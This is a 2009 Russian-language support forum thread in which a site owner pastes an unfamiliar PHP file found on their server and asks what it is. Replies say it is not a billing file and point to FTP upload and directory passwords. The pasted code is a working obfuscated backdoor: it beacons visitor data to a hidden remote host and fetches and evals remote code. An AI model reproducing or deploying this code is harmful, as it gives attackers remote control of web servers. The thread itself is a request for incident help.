Странник XXX Опубликовано 9 января, 2009 Жалоба Поделиться Опубликовано 9 января, 2009 В папке обнаружил файл под цифровым именем следующего содержания: <? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cGhwc2VhcmNoLmNu");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="85ef4b6422a2bee30751d8a06f0b309a") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2FkczIu").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?> Что это, стучалка или вирь который меня ломал? Ссылка на комментарий Поделиться на другие сайты Поделиться
Lazek Опубликовано 9 января, 2009 Жалоба Поделиться Опубликовано 9 января, 2009 Это точно не стандартный файл... Ссылка на комментарий Поделиться на другие сайты Поделиться
admin Опубликовано 10 января, 2009 Жалоба Поделиться Опубликовано 10 января, 2009 Это - не файл биллинга. Проверяйте логи и пр., скорее всего, залили по FTP. Биллинг не создает файлов за исключением /admin/backup/, /admin/helpdesk/. У Вас ведь /admin/ запаролирована? Ссылка на комментарий Поделиться на другие сайты Поделиться
Странник XXX Опубликовано 10 января, 2009 Автор Жалоба Поделиться Опубликовано 10 января, 2009 А на вскидку можно узнать что это за файл такой и чего он делал? Ссылка на комментарий Поделиться на другие сайты Поделиться
Странник XXX Опубликовано 10 января, 2009 Автор Жалоба Поделиться Опубликовано 10 января, 2009 Это - не файл биллинга. Проверяйте логи и пр., скорее всего, залили по FTP. Биллинг не создает файлов за исключением /admin/backup/, /admin/helpdesk/. У Вас ведь /admin/ запаролирована? Разумеется, а не скажите где можно поменять этот пароль на папку в каком файле? Ссылка на комментарий Поделиться на другие сайты Поделиться
rrr Опубликовано 10 января, 2009 Жалоба Поделиться Опубликовано 10 января, 2009 в панели управлния хостингом что-то типа "Защита директорий" или тут /home/логин/.htpasswds/public_html/папка-биллинга/admin/passwd (точный путь можно увидеть в файле .htaccess в зашифрованной директории) но там он зашифрован Ссылка на комментарий Поделиться на другие сайты Поделиться
admin Опубликовано 10 января, 2009 Жалоба Поделиться Опубликовано 10 января, 2009 А на вскидку можно узнать что это за файл такой и чего он делал? Что он делал, как туда попал и пр - не знаю и знать не хочу Если /admin/ запролирована, то через BPanel попасть не мог. Ссылка на комментарий Поделиться на другие сайты Поделиться
Рекомендуемые сообщения
Для публикации сообщений создайте учётную запись или авторизуйтесь
Вы должны быть пользователем, чтобы оставить комментарий
Создать учетную запись
Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!
Регистрация нового пользователяВойти
Уже есть аккаунт? Войти в систему.
Войти